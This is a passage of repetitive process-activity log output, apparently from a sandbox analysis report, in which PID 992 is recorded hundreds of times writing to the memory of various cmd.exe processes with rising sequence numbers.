PID 992 wrote to memory of 2012	992	cmd.exe	352
PID 992 wrote to memory of 1524	992	cmd.exe	353
PID 992 wrote to memory of 1524	992	cmd.exe	353
PID 992 wrote to memory of 1524	992	cmd.exe	353
PID 992 wrote to memory of 1472	992	cmd.exe	354
PID 992 wrote to memory of 1472	992	cmd.exe	354
PID 992 wrote to memory of 1472	992	cmd.exe	354
PID 992 wrote to memory of 1528	992	cmd.exe	355
PID 992 wrote to memory of 1528	992	cmd.exe	355
PID 992 wrote to memory of 1528	992	cmd.exe	355
PID 992 wrote to memory of 1828	992	cmd.exe	356
PID 992 wrote to memory of 1828	992	cmd.exe	356
PID 992 wrote to memory of 1828	992	cmd.exe	356
PID 992 wrote to memory of 1804	992	cmd.exe	357
PID 992 wrote to memory of 1804	992	cmd.exe	357
PID 992 wrote to memory of 1804	992	cmd.exe	357
PID 992 wrote to memory of 1996	992	cmd.exe	358
PID 992 wrote to memory of 1996	992	cmd.exe	358
PID 992 wrote to memory of 1996	992	cmd.exe	358
PID 992 wrote to memory of 1112	992	cmd.exe	359
PID 992 wrote to memory of 1112	992	cmd.exe	359
PID 992 wrote to memory of 1112	992	cmd.exe	359
PID 992 wrote to memory of 1168	992	cmd.exe	360
PID 992 wrote to memory of 1168	992	cmd.exe	360
PID 992 wrote to memory of 1168	992	cmd.exe	360
PID 992 wrote to memory of 1964	992	cmd.exe	361
PID 992 wrote to memory of 1964	992	cmd.exe	361
PID 992 wrote to memory of 1964	992	cmd.exe	361
PID 992 wrote to memory of 288	992	cmd.exe	362
PID 992 wrote to memory of 288	992	cmd.exe	362
PID 992 wrote to memory of 288	992	cmd.exe	362
PID 992 wrote to memory of 864	992	cmd.exe	363
PID 992 wrote to memory of 864	992	cmd.exe	363
PID 992 wrote to memory of 864	992	cmd.exe	363
PID 992 wrote to memory of 1812	992	cmd.exe	364
PID 992 wrote to memory of 1812	992	cmd.exe	364
PID 992 wrote to memory of 1812	992	cmd.exe	364
PID 992 wrote to memory of 1552	992	cmd.exe	365
PID 992 wrote to memory of 1552	992	cmd.exe	365
PID 992 wrote to memory of 1552	992	cmd.exe	365
PID 992 wrote to memory of 1960	992	cmd.exe	366
PID 992 wrote to memory of 1960	992	cmd.exe	366
PID 992 wrote to memory of 1960	992	cmd.exe	366
PID 992 wrote to memory of 1968	992	cmd.exe	367
PID 992 wrote to memory of 1968	992	cmd.exe	367
PID 992 wrote to memory of 1968	992	cmd.exe	367
PID 992 wrote to memory of 1136	992	cmd.exe	368
PID 992 wrote to memory of 1136	992	cmd.exe	368
PID 992 wrote to memory of 1136	992	cmd.exe	368
PID 992 wrote to memory of 1088	992	cmd.exe	369
PID 992 wrote to memory of 1088	992	cmd.exe	369
PID 992 wrote to memory of 1088	992	cmd.exe	369
PID 992 wrote to memory of 1972	992	cmd.exe	370
PID 992 wrote to memory of 1972	992	cmd.exe	370
PID 992 wrote to memory of 1972	992	cmd.exe	370
PID 992 wrote to memory of 688	992	cmd.exe	371
PID 992 wrote to memory of 688	992	cmd.exe	371
PID 992 wrote to memory of 688	992	cmd.exe	371
PID 992 wrote to memory of 920	992	cmd.exe	372
PID 992 wrote to memory of 920	992	cmd.exe	372
PID 992 wrote to memory of 920	992	cmd.exe	372
PID 992 wrote to memory of 1468	992	cmd.exe	373
PID 992 wrote to memory of 1468	992	cmd.exe	373
PID 992 wrote to memory of 1468	992	cmd.exe	373
PID 992 wrote to memory of 1212	992	cmd.exe	374
PID 992 wrote to memory of 1212	992	cmd.exe	374
PID 992 wrote to memory of 1212	992	cmd.exe	374
PID 992 wrote to memory of 1656	992	cmd.exe	375
PID 992 wrote to memory of 1656	992	cmd.exe	375
PID 992 wrote to memory of 1656	992	cmd.exe	375
PID 992 wrote to memory of 1176	992	cmd.exe	376
PID 992 wrote to memory of 1176	992	cmd.exe	376
PID 992 wrote to memory of 1176	992	cmd.exe	376
PID 992 wrote to memory of 1356	992	cmd.exe	377
PID 992 wrote to memory of 1356	992	cmd.exe	377
PID 992 wrote to memory of 1356	992	cmd.exe	377
PID 992 wrote to memory of 1032	992	cmd.exe	378
PID 992 wrote to memory of 1032	992	cmd.exe	378
PID 992 wrote to memory of 1032	992	cmd.exe	378
PID 992 wrote to memory of 660	992	cmd.exe	379
PID 992 wrote to memory of 660	992	cmd.exe	379
PID 992 wrote to memory of 660	992	cmd.exe	379
PID 992 wrote to memory of 1484	992	cmd.exe	380
PID 992 wrote to memory of 1484	992	cmd.exe	380
PID 992 wrote to memory of 1484	992	cmd.exe	380
PID 992 wrote to memory of 2012	992	cmd.exe	381
PID 992 wrote to memory of 2012	992	cmd.exe	381
PID 992 wrote to memory of 2012	992	cmd.exe	381
PID 992 wrote to memory of 1524	992	cmd.exe	382
PID 992 wrote to memory of 1524	992	cmd.exe	382
PID 992 wrote to memory of 1524	992	cmd.exe	382
PID 992 wrote to memory of 1472	992	cmd.exe	383
PID 992 wrote to memory of 1472	992	cmd.exe	383
PID 992 wrote to memory of 1472	992	cmd.exe	383
PID 992 wrote to memory of 1528	992	cmd.exe	384
PID 992 wrote to memory of 1528	992	cmd.exe	384
PID 992 wrote to memory of 1528	992	cmd.exe	384
PID 992 wrote to memory of 1828	992	cmd.exe	385
PID 992 wrote to memory of 1828	992	cmd.exe	385
PID 992 wrote to memory of 1828	992	cmd.exe	385
PID 992 wrote to memory of 1992	992	cmd.exe	386
PID 992 wrote to memory of 1992	992	cmd.exe	386
PID 992 wrote to memory of 1992	992	cmd.exe	386
PID 992 wrote to memory of 1516	992	cmd.exe	387
PID 992 wrote to memory of 1516	992	cmd.exe	387
PID 992 wrote to memory of 1516	992	cmd.exe	387
PID 992 wrote to memory of 1796	992	cmd.exe	388
PID 992 wrote to memory of 1796	992	cmd.exe	388
PID 992 wrote to memory of 1796	992	cmd.exe	388
PID 992 wrote to memory of 1956	992	cmd.exe	389
PID 992 wrote to memory of 1956	992	cmd.exe	389
PID 992 wrote to memory of 1956	992	cmd.exe	389
PID 992 wrote to memory of 1256	992	cmd.exe	390
PID 992 wrote to memory of 1256	992	cmd.exe	390
PID 992 wrote to memory of 1256	992	cmd.exe	390
PID 992 wrote to memory of 2020	992	cmd.exe	391
PID 992 wrote to memory of 2020	992	cmd.exe	391
PID 992 wrote to memory of 2020	992	cmd.exe	391
PID 992 wrote to memory of 240	992	cmd.exe	392
PID 992 wrote to memory of 240	992	cmd.exe	392
PID 992 wrote to memory of 240	992	cmd.exe	392
PID 992 wrote to memory of 736	992	cmd.exe	393
PID 992 wrote to memory of 736	992	cmd.exe	393
PID 992 wrote to memory of 736	992	cmd.exe	393
PID 992 wrote to memory of 1824	992	cmd.exe	394
PID 992 wrote to memory of 1824	992	cmd.exe	394
PID 992 wrote to memory of 1824	992	cmd.exe	394
PID 992 wrote to memory of 1976	992	cmd.exe	395
PID 992 wrote to memory of 1976	992	cmd.exe	395
PID 992 wrote to memory of 1976	992	cmd.exe	395
PID 992 wrote to memory of 1552	992	cmd.exe	396
PID 992 wrote to memory of 1552	992	cmd.exe	396
PID 992 wrote to memory of 1552	992	cmd.exe	396
PID 992 wrote to memory of 1960	992	cmd.exe	397
PID 992 wrote to memory of 1960	992	cmd.exe	397
PID 992 wrote to memory of 1960	992	cmd.exe	397
PID 992 wrote to memory of 1968	992	cmd.exe	398
PID 992 wrote to memory of 1968	992	cmd.exe	398
PID 992 wrote to memory of 1968	992	cmd.exe	398
PID 992 wrote to memory of 1136	992	cmd.exe	399
PID 992 wrote to memory of 1136	992	cmd.exe	399
PID 992 wrote to memory of 1136	992	cmd.exe	399
PID 992 wrote to memory of 1088	992	cmd.exe	400
PID 992 wrote to memory of 1088	992	cmd.exe	400
PID 992 wrote to memory of 1088	992	cmd.exe	400
PID 992 wrote to memory of 1972	992	cmd.exe	401
PID 992 wrote to memory of 1972	992	cmd.exe	401
PID 992 wrote to memory of 1972	992	cmd.exe	401
PID 992 wrote to memory of 688	992	cmd.exe	402
PID 992 wrote to memory of 688	992	cmd.exe	402
PID 992 wrote to memory of 688	992	cmd.exe	402
PID 992 wrote to memory of 920	992	cmd.exe	403
PID 992 wrote to memory of 920	992	cmd.exe	403
PID 992 wrote to memory of 920	992	cmd.exe	403
PID 992 wrote to memory of 1468	992	cmd.exe	404
PID 992 wrote to memory of 1468	992	cmd.exe	404
PID 992 wrote to memory of 1468	992	cmd.exe	404
PID 992 wrote to memory of 1212	992	cmd.exe	405
PID 992 wrote to memory of 1212	992	cmd.exe	405
PID 992 wrote to memory of 1212	992	cmd.exe	405
PID 992 wrote to memory of 1656	992	cmd.exe	406
PID 992 wrote to memory of 1656	992	cmd.exe	406
PID 992 wrote to memory of 1656	992	cmd.exe	406
PID 992 wrote to memory of 1176	992	cmd.exe	407
PID 992 wrote to memory of 1176	992	cmd.exe	407
PID 992 wrote to memory of 1176	992	cmd.exe	407
PID 992 wrote to memory of 1356	992	cmd.exe	408
PID 992 wrote to memory of 1356	992	cmd.exe	408
PID 992 wrote to memory of 1356	992	cmd.exe	408
PID 992 wrote to memory of 1032	992	cmd.exe	409
PID 992 wrote to memory of 1032	992	cmd.exe	409
PID 992 wrote to memory of 1032	992	cmd.exe	409
PID 992 wrote to memory of 660	992	cmd.exe	410
PID 992 wrote to memory of 660	992	cmd.exe	410
PID 992 wrote to memory of 660	992	cmd.exe	410
PID 992 wrote to memory of 1484	992	cmd.exe	411
PID 992 wrote to memory of 1484	992	cmd.exe	411
PID 992 wrote to memory of 1484	992	cmd.exe	411
PID 992 wrote to memory of 2012	992	cmd.exe	412
PID 992 wrote to memory of 2012	992	cmd.exe	412
PID 992 wrote to memory of 2012	992	cmd.exe	412
PID 992 wrote to memory of 1524	992	cmd.exe	413
PID 992 wrote to memory of 1524	992	cmd.exe	413
PID 992 wrote to memory of 1524	992	cmd.exe	413
PID 992 wrote to memory of 1472	992	cmd.exe	414
PID 992 wrote to memory of 1472	992	cmd.exe	414
PID 992 wrote to memory of 1472	992	cmd.exe	414
PID 992 wrote to memory of 1528	992	cmd.exe	415
PID 992 wrote to memory of 1528	992	cmd.exe	415
PID 992 wrote to memory of 1528	992	cmd.exe	415
PID 992 wrote to memory of 1828	992	cmd.exe	416
PID 992 wrote to memory of 1828	992	cmd.exe	416
PID 992 wrote to memory of 1828	992	cmd.exe	416
PID 992 wrote to memory of 1992	992	cmd.exe	417
PID 992 wrote to memory of 1992	992	cmd.exe	417
PID 992 wrote to memory of 1992	992	cmd.exe	417
PID 992 wrote to memory of 1516	992	cmd.exe	418
PID 992 wrote to memory of 1516	992	cmd.exe	418
PID 992 wrote to memory of 1516	992	cmd.exe	418
PID 992 wrote to memory of 1796	992	cmd.exe	419
PID 992 wrote to memory of 1796	992	cmd.exe	419
PID 992 wrote to memory of 1796	992	cmd.exe	419
PID 992 wrote to memory of 1956	992	cmd.exe	420
PID 992 wrote to memory of 1956	992	cmd.exe	420
PID 992 wrote to memory of 1956	992	cmd.exe	420
PID 992 wrote to memory of 1256	992	cmd.exe	421
PID 992 wrote to memory of 1256	992	cmd.exe	421
PID 992 wrote to memory of 1256	992	cmd.exe	421
PID 992 wrote to memory of 2020	992	cmd.exe	422
PID 992 wrote to memory of 2020	992	cmd.exe	422
PID 992 wrote to memory of 2020	992	cmd.exe	422
PID 992 wrote to memory of 240	992	cmd.exe	423
PID 992 wrote to memory of 240	992	cmd.exe	423
PID 992 wrote to memory of 240	992	cmd.exe	423
PID 992 wrote to memory of 736	992	cmd.exe	424
PID 992 wrote to memory of 736	992	cmd.exe	424
PID 992 wrote to memory of 736	992	cmd.exe	424
PID 992 wrote to memory of 1824	992	cmd.exe	425
PID 992 wrote to memory of 1824	992	cmd.exe	425
PID 992 wrote to memory of 1824	992	cmd.exe	425
PID 992 wrote to memory of 1976	992	cmd.exe	426
PID 992 wrote to memory of 1976	992	cmd.exe	426
PID 992 wrote to memory of 1976	992	cmd.exe	426
PID 992 wrote to memory of 1552	992	cmd.exe	427
PID 992 wrote to memory of 1552	992	cmd.exe	427
PID 992 wrote to memory of 1552	992	cmd.exe	427
PID 992 wrote to memory of 1960	992	cmd.exe	428
PID 992 wrote to memory of 1960	992	cmd.exe	428
PID 992 wrote to memory of 1960	992	cmd.exe	428
PID 992 wrote to memory of 1968	992	cmd.exe	429
PID 992 wrote to memory of 1968	992	cmd.exe	429
PID 992 wrote to memory of 1968	992	cmd.exe	429
PID 992 wrote to memory of 1136	992	cmd.exe	430
PID 992 wrote to memory of 1136	992	cmd.exe	430
PID 992 wrote to memory of 1136	992	cmd.exe	430
PID 992 wrote to memory of 1088	992	cmd.exe	431
PID 992 wrote to memory of 1088	992	cmd.exe	431
PID 992 wrote to memory of 1088	992	cmd.exe	431
PID 992 wrote to memory of 1972	992	cmd.exe	432
PID 992 wrote to memory of 1972	992	cmd.exe	432
PID 992 wrote to memory of 1972	992	cmd.exe	432
PID 992 wrote to memory of 688	992	cmd.exe	433
PID 992 wrote to memory of 688	992	cmd.exe	433
PID 992 wrote to memory of 688	992	cmd.exe	433
PID 992 wrote to memory of 920	992	cmd.exe	434
PID 992 wrote to memory of 920	992	cmd.exe	434
PID 992 wrote to memory of 920	992	cmd.exe	434
PID 992 wrote to memory of 1468	992	cmd.exe	435
PID 992 wrote to memory of 1468	992	cmd.exe	435
PID 992 wrote to memory of 1468	992	cmd.exe	435
PID 992 wrote to memory of 1212	992	cmd.exe	436
PID 992 wrote to memory of 1212	992	cmd.exe	436
PID 992 wrote to memory of 1212	992	cmd.exe	436
PID 992 wrote to memory of 1656	992	cmd.exe	437
PID 992 wrote to memory of 1656	992	cmd.exe	437
PID 992 wrote to memory of 1656	992	cmd.exe	437
PID 992 wrote to memory of 1176	992	cmd.exe	438
PID 992 wrote to memory of 1176	992	cmd.exe	438
PID 992 wrote to memory of 1176	992	cmd.exe	438
PID 992 wrote to memory of 1356	992	cmd.exe	439
PID 992 wrote to memory of 1356	992	cmd.exe	439
PID 992 wrote to memory of 1356	992	cmd.exe	439
PID 992 wrote to memory of 1032	992	cmd.exe	440
PID 992 wrote to memory of 1032	992	cmd.exe	440
PID 992 wrote to memory of 1032	992	cmd.exe	440
PID 992 wrote to memory of 660	992	cmd.exe	441
PID 992 wrote to memory of 660	992	cmd.exe	441
PID 992 wrote to memory of 660	992	cmd.exe	441
PID 992 wrote to memory of 1484	992	cmd.exe	442
PID 992 wrote to memory of 1484	992	cmd.exe	442
PID 992 wrote to memory of 1484	992	cmd.exe	442
PID 992 wrote to memory of 2012	992	cmd.exe	443
PID 992 wrote to memory of 2012	992	cmd.exe	443
PID 992 wrote to memory of 2012	992	cmd.exe	443
PID 992 wrote to memory of 1524	992	cmd.exe	444
PID 992 wrote to memory of 1524	992	cmd.exe	444
PID 992 wrote to memory of 1524	992	cmd.exe	444
PID 992 wrote to memory of 1472	992	cmd.exe	445
PID 992 wrote to memory of 1472	992	cmd.exe	445
PID 992 wrote to memory of 1472	992	cmd.exe	445
PID 992 wrote to memory of 1528	992	cmd.exe	446
PID 992 wrote to memory of 1528	992	cmd.exe	446
PID 992 wrote to memory of 1528	992	cmd.exe	446
PID 992 wrote to memory of 1828	992	cmd.exe	447
PID 992 wrote to memory of 1828	992	cmd.exe	447
PID 992 wrote to memory of 1828	992	cmd.exe	447
PID 992 wrote to memory of 1992	992	cmd.exe	448
PID 992 wrote to memory of 1992	992	cmd.exe	448
PID 992 wrote to memory of 1992	992	cmd.exe	448
PID 992 wrote to memory of 1516	992	cmd.exe	449
PID 992 wrote to memory of 1516	992	cmd.exe	449
PID 992 wrote to memory of 1516	992	cmd.exe	449
PID 992 wrote to memory of 1796	992	cmd.exe	450
PID 992 wrote to memory of 1796	992	cmd.exe	450
PID 992 wrote to memory of 1796	992	cmd.exe	450
PID 992 wrote to memory of 1956	992	cmd.exe	451
PID 992 wrote to memory of 1956	992	cmd.exe	451
PID 992 wrote to memory of 1956	992	cmd.exe	451
PID 992 wrote to memory of 1256	992	cmd.exe	452
PID 992 wrote to memory of 1256	992	cmd.exe	452
PID 992 wrote to memory of 1256	992	cmd.exe	452
PID 992 wrote to memory of 2020	992	cmd.exe	453
PID 992 wrote to memory of 2020	992	cmd.exe	453
PID 992 wrote to memory of 2020	992	cmd.exe	453
PID 992 wrote to memory of 240	992	cmd.exe	454
PID 992 wrote to memory of 240	992	cmd.exe	454
PID 992 wrote to memory of 240	992	cmd.exe	454
PID 992 wrote to memory of 736	992	cmd.exe	455
PID 992 wrote to memory of 736	992	cmd.exe	455
PID 992 wrote to memory of 736	992	cmd.exe	455
PID 992 wrote to memory of 1824	992	cmd.exe	456
PID 992 wrote to memory of 1824	992	cmd.exe	456
PID 992 wrote to memory of 1824	992	cmd.exe	456
PID 992 wrote to memory of 1976	992	cmd.exe	457
PID 992 wrote to memory of 1976	992	cmd.exe	457
PID 992 wrote to memory of 1976	992	cmd.exe	457
PID 992 wrote to memory of 1552	992	cmd.exe	458
PID 992 wrote to memory of 1552	992	cmd.exe	458
PID 992 wrote to memory of 1552	992	cmd.exe	458
PID 992 wrote to memory of 1960	992	cmd.exe	459
PID 992 wrote to memory of 1960	992	cmd.exe	459
PID 992 wrote to memory of 1960	992	cmd.exe	459
PID 992 wrote to memory of 1968	992	cmd.exe	460
PID 992 wrote to memory of 1968	992	cmd.exe	460
PID 992 wrote to memory of 1968	992	cmd.exe	460
PID 992 wrote to memory of 1136	992	cmd.exe	461
PID 992 wrote to memory of 1136	992	cmd.exe	461
PID 992 wrote to memory of 1136	992	cmd.exe	461
PID 992 wrote to memory of 1088	992	cmd.exe	462
PID 992 wrote to memory of 1088	992	cmd.exe	462
PID 992 wrote to memory of 1088	992	cmd.exe	462
PID 992 wrote to memory of 1972	992	cmd.exe	463
PID 992 wrote to memory of 1972	992	cmd.exe	463
PID 992 wrote to memory of 1972	992	cmd.exe	463
PID 992 wrote to memory of 688	992	cmd.exe	464
PID 992 wrote to memory of 688	992	cmd.exe	464
PID 992 wrote to memory of 688	992	cmd.exe	464
PID 992 wrote to memory of 920	992	cmd.exe	465
PID 992 wrote to memory of 920	992	cmd.exe	465
PID 992 wrote to memory of 920	992	cmd.exe	465
PID 992 wrote to memory of 1468	992	cmd.exe	466
PID 992 wrote to memory of 1468	992	cmd.exe	466
PID 992 wrote to memory of 1468	992	cmd.exe	466
PID 992 wrote to memory of 1212	992	cmd.exe	467
PID 992 wrote to memory of 1212	992	cmd.exe	467
PID 992 wrote to memory of 1212	992	cmd.exe	467
PID 992 wrote to memory of 1656	992	cmd.exe	468
PID 992 wrote to memory of 1656	992	cmd.exe	468
PID 992 wrote to memory of 1656	992	cmd.exe	468
PID 992 wrote to memory of 1176	992	cmd.exe	469
PID 992 wrote to memory of 1176	992	cmd.exe	469
PID 992 wrote to memory of 1176	992	cmd.exe	469
PID 992 wrote to memory of 1356	992	cmd.exe	470
PID 992 wrote to memory of 1356	992	cmd.exe	470
PID 992 wrote to memory of 1356	992	cmd.exe	470
PID 992 wrote to memory of 1032	992	cmd.exe	471
PID 992 wrote to memory of 1032	992	cmd.exe	471
PID 992 wrote to memory of 1032	992	cmd.exe	471
PID 992 wrote to memory of 660	992	cmd.exe	472
PID 992 wrote to memory of 660	992	cmd.exe	472
PID 992 wrote to memory of 660	992	cmd.exe	472
PID 992 wrote to memory of 1484	992	cmd.exe	473
PID 992 wrote to memory of 1484	992	cmd.exe	473
PID 992 wrote to memory of 1484	992	cmd.exe	473
PID 992 wrote to memory of 2012	992	cmd.exe	474
PID 992 wrote to memory of 2012	992	cmd.exe	474
PID 992 wrote to memory of 2012	992	cmd.exe	474
PID 992 wrote to memory of 1524	992	cmd.exe	475
PID 992 wrote to memory of 1524	992	cmd.exe	475
PID 992 wrote to memory of 1524	992	cmd.exe	475
PID 992 wrote to memory of 1472	992	cmd.exe	476
PID 992 wrote to memory of 1472	992	cmd.exe	476
PID 992 wrote to memory of 1472	992	cmd.exe	476
PID 992 wrote to memory of 1528	992	cmd.exe	477
PID 992 wrote to memory of 1528	992	cmd.exe	477
PID 992 wrote to memory of 1528	992	cmd.exe	477
PID 992 wrote to memory of 1828	992	cmd.exe	478
PID 992 wrote to memory of 1828	992	cmd.exe	478
PID 992 wrote to memory of 1828	992	cmd.exe	478
PID 992 wrote to memory of 1992	992	cmd.exe	479
PID 992 wrote to memory of 1992	992	cmd.exe	479
PID 992 wrote to memory of 1992	992	cmd.exe	479
PID 992 wrote to memory of 1516	992	cmd.exe	480
PID 992 wrote to memory of 1516	992	cmd.exe	480
PID 992 wrote to memory of 1516	992	cmd.exe	480
PID 992 wrote to memory of 1796	992	cmd.exe	481
PID 992 wrote to memory of 1796	992	cmd.exe	481
PID 992 wrote to memory of 1796	992	cmd.exe	481
PID 992 wrote to memory of 1956	992	cmd.exe	482
PID 992 wrote to memory of 1956	992	cmd.exe	482
PID 992 wrote to memory of 1956	992	cmd.exe	482
PID 992 wrote to memory of 1256	992	cmd.exe	483
PID 992 wrote to memory of 1256	992	cmd.exe	483
PID 992 wrote to memory of 1256	992	cmd.exe	483
PID 992 wrote to memory of 2020	992	cmd.exe	484
PID 992 wrote to memory of 2020	992	cmd.exe	484
PID 992 wrote to memory of 2020	992	cmd.exe	484
PID 992 wrote to memory of 240	992	cmd.exe	485
PID 992 wrote to memory of 240	992	cmd.exe	485
PID 992 wrote to memory of 240	992	cmd.exe	485
PID 992 wrote to memory of 736	992	cmd.exe	486
PID 992 wrote to memory of 736	992	cmd.exe	486
PID 992 wrote to memory of 736	992	cmd.exe	486
PID 992 wrote to memory of 1824	992	cmd.exe	487
PID 992 wrote to memory of 1824	992	cmd.exe	487
PID 992 wrote to memory of 1824	992	cmd.exe	487
PID 992 wrote to memory of 1976	992	cmd.exe	488
PID 992 wrote to memory of 1976	992	cmd.exe	488
PID 992 wrote to memory of 1976	992	cmd.exe	488
PID 992 wrote to memory of 1552	992	cmd.exe	489
PID 992 wrote to memory of 1552	992	cmd.exe	489
PID 992 wrote to memory of 1552	992	cmd.exe	489
PID 992 wrote to memory of 1960	992	cmd.exe	490
PID 992 wrote to memory of 1960	992	cmd.exe	490
PID 992 wrote to memory of 1960	992	cmd.exe	490
PID 992 wrote to memory of 1968	992	cmd.exe	491
PID 992 wrote to memory of 1968	992	cmd.exe	491
PID 992 wrote to memory of 1968	992	cmd.exe	491
PID 992 wrote to memory of 1136	992	cmd.exe	492
PID 992 wrote to memory of 1136	992	cmd.exe	492
PID 992 wrote to memory of 1136	992	cmd.exe	492
PID 992 wrote to memory of 1088	992	cmd.exe	493
PID 992 wrote to memory of 1088	992	cmd.exe	493
PID 992 wrote to memory of 1088	992	cmd.exe	493
PID 992 wrote to memory of 1972	992	cmd.exe	494
PID 992 wrote to memory of 1972	992	cmd.exe	494
PID 992 wrote to memory of 1972	992	cmd.exe	494
PID 992 wrote to memory of 688	992	cmd.exe	495
PID 992 wrote to memory of 688	992	cmd.exe	495
PID 992 wrote to memory of 688	992	cmd.exe	495
PID 992 wrote to memory of 920	992	cmd.exe	496
PID 992 wrote to memory of 920	992	cmd.exe	496
PID 992 wrote to memory of 920	992	cmd.exe	496
PID 992 wrote to memory of 1468	992	cmd.exe	497
PID 992 wrote to memory of 1468	992	cmd.exe	497
PID 992 wrote to memory of 1468	992	cmd.exe	497
PID 992 wrote to memory of 1212	992	cmd.exe	498
PID 992 wrote to memory of 1212	992	cmd.exe	498
PID 992 wrote to memory of 1212	992	cmd.exe	498
PID 992 wrote to memory of 1656	992	cmd.exe	499
PID 992 wrote to memory of 1656	992	cmd.exe	499
PID 992 wrote to memory of 1656	992	cmd.exe	499
PID 992 wrote to memory of 1176	992	cmd.exe	500
PID 992 wrote to memory of 1176	992	cmd.exe	500
PID 992 wrote to memory of 1176	992	cmd.exe	500
PID 992 wrote to memory of 1356	992	cmd.exe	501
PID 992 wrote to memory of 1356	992	cmd.exe	501
PID 992 wrote to memory of 1356	992	cmd.exe	501
PID 992 wrote to memory of 1032	992	cmd.exe	502
PID 992 wrote to memory of 1032	992	cmd.exe	502
PID 992 wrote to memory of 1032	992	cmd.exe	502
PID 992 wrote to memory of 660	992	cmd.exe	503
PID 992 wrote to memory of 660	992	cmd.exe	503
PID 992 wrote to memory of 660	992	cmd.exe	503
PID 992 wrote to memory of 1484	992	cmd.exe	504
PID 992 wrote to memory of 1484	992	cmd.exe	504
PID 992 wrote to memory of 1484	992	cmd.exe	504
PID 992 wrote to memory of 2012	992	cmd.exe	505
PID 992 wrote to memory of 2012	992	cmd.exe	505
PID 992 wrote to memory of 2012	992	cmd.exe	505
PID 992 wrote to memory of 1524	992	cmd.exe	506
PID 992 wrote to memory of 1524	992	cmd.exe	506
PID 992 wrote to memory of 1524	992	cmd.exe	506
PID 992 wrote to memory of 1472	992	cmd.exe	507
PID 992 wrote to memory of 1472	992	cmd.exe	507
PID 992 wrote to memory of 1472	992	cmd.exe	507
PID 992 wrote to memory of 1528	992	cmd.exe	508
PID 992 wrote to memory of 1528	992	cmd.exe	508
PID 992 wrote to memory of 1528	992	cmd.exe	508
PID 992 wrote to memory of 1828	992	cmd.exe	509
PID 992 wrote to memory of 1828	992	cmd.exe	509
PID 992 wrote to memory of 1828	992	cmd.exe	509
PID 992 wrote to memory of 1992	992	cmd.exe	510
PID 992 wrote to memory of 1992	992	cmd.exe	510
PID 992 wrote to memory of 1992	992	cmd.exe	510
PID 992 wrote to memory of 1516	992	cmd.exe	511
PID 992 wrote to memory of 1516	992	cmd.exe	511
PID 992 wrote to memory of 1516	992	cmd.exe	511
PID 992 wrote to memory of 1796	992	cmd.exe	512
PID 992 wrote to memory of 1796	992	cmd.exe	512
PID 992 wrote to memory of 1796	992	cmd.exe	512
PID 992 wrote to memory of 1956	992	cmd.exe	513
PID 992 wrote to memory of 1956	992	cmd.exe	513
PID 992 wrote to memory of 1956	992	cmd.exe	513
PID 992 wrote to memory of 1256	992	cmd.exe	514
PID 992 wrote to memory of 1256	992	cmd.exe	514
PID 992 wrote to memory of 1256	992	cmd.exe	514
PID 992 wrote to memory of 2020	992	cmd.exe	515
PID 992 wrote to memory of 2020	992	cmd.exe	515
PID 992 wrote to memory of 2020	992	cmd.exe	515
PID 992 wrote to memory of 240	992	cmd.exe	516
PID 992 wrote to memory of 240	992	cmd.exe	516
PID 992 wrote to memory of 240	992	cmd.exe	516
PID 992 wrote to memory of 736	992	cmd.exe	517
PID 992 wrote to memory of 736	992	cmd.exe	517
PID 992 wrote to memory of 736	992	cmd.exe	517
PID 992 wrote to memory of 1824	992	cmd.exe	518
PID 992 wrote to memory of 1824	992	cmd.exe	518
PID 992 wrote to memory of 1824	992	cmd.exe	518
PID 992 wrote to memory of 1976	992	cmd.exe	519
PID 992 wrote to memory of 1976	992	cmd.exe	519
PID 992 wrote to memory of 1976	992	cmd.exe	519
PID 992 wrote to memory of 1552	992	cmd.exe	520
PID 992 wrote to memory of 1552	992	cmd.exe	520
PID 992 wrote to memory of 1552	992	cmd.exe	520
PID 992 wrote to memory of 1960	992	cmd.exe	521
PID 992 wrote to memory of 1960	992	cmd.exe	521
PID 992 wrote to memory of 1960	992	cmd.exe	521
PID 992 wrote to memory of 1968	992	cmd.exe	522
PID 992 wrote to memory of 1968	992	cmd.exe	522
PID 992 wrote to memory of 1968	992	cmd.exe	522
PID 992 wrote to memory of 1136	992	cmd.exe	523
PID 992 wrote to memory of 1136	992	cmd.exe	523
PID 992 wrote to memory of 1136	992	cmd.exe	523
PID 992 wrote to memory of 1088	992	cmd.exe	524
PID 992 wrote to memory of 1088	992	cmd.exe	524
PID 992 wrote to memory of 1088	992	cmd.exe	524
PID 992 wrote to memory of 1972	992	cmd.exe	525
PID 992 wrote to memory of 1972	992	cmd.exe	525
PID 992 wrote to memory of 1972	992	cmd.exe	525
PID 992 wrote to memory of 688	992	cmd.exe	526
PID 992 wrote to memory of 688	992	cmd.exe	526
PID 992 wrote to memory of 688	992	cmd.exe	526
PID 992 wrote to memory of 920	992	cmd.exe	527
PID 992 wrote to memory of 920	992	cmd.exe	527
PID 992 wrote to memory of 920	992	cmd.exe	527
PID 992 wrote to memory of 1468	992	cmd.exe	528
PID 992 wrote to memory of 1468	992	cmd.exe	528
PID 992 wrote to memory of 1468	992	cmd.exe	528
PID 992 wrote to memory of 1212	992	cmd.exe	529
PID 992 wrote to memory of 1212	992	cmd.exe	529
PID 992 wrote to memory of 1212	992	cmd.exe	529
PID 992 wrote to memory of 1656	992	cmd.exe	530
PID 992 wrote to memory of 1656	992	cmd.exe	530
PID 992 wrote to memory of 1656	992	cmd.exe	530
PID 992 wrote to memory of 1176	992	cmd.exe	531
PID 992 wrote to memory of 1176	992	cmd.exe	531
PID 992 wrote to memory of 1176	992	cmd.exe	531
PID 992 wrote to memory of 1356	992	cmd.exe	532
PID 992 wrote to memory of 1356	992	cmd.exe	532
PID 992 wrote to memory of 1356	992	cmd.exe	532
PID 992 wrote to memory of 1032	992	cmd.exe	533
PID 992 wrote to memory of 1032	992	cmd.exe	533
PID 992 wrote to memory of 1032	992	cmd.exe	533
PID 992 wrote to memory of 660	992	cmd.exe	534
PID 992 wrote to memory of 660	992	cmd.exe	534
PID 992 wrote to memory of 660	992	cmd.exe	534
PID 992 wrote to memory of 1484	992	cmd.exe	535
PID 992 wrote to memory of 1484	992	cmd.exe	535
PID 992 wrote to memory of 1484	992	cmd.exe	535
PID 992 wrote to memory of 2012	992	cmd.exe	536
PID 992 wrote to memory of 2012	992	cmd.exe	536
PID 992 wrote to memory of 2012	992	cmd.exe	536
PID 992 wrote to memory of 1524	992	cmd.exe	537
PID 992 wrote to memory of 1524	992	cmd.exe	537
PID 992 wrote to memory of 1524	992	cmd.exe	537
PID 992 wrote to memory of 1472	992	cmd.exe	538
PID 992 wrote to memory of 1472	992	cmd.exe	538
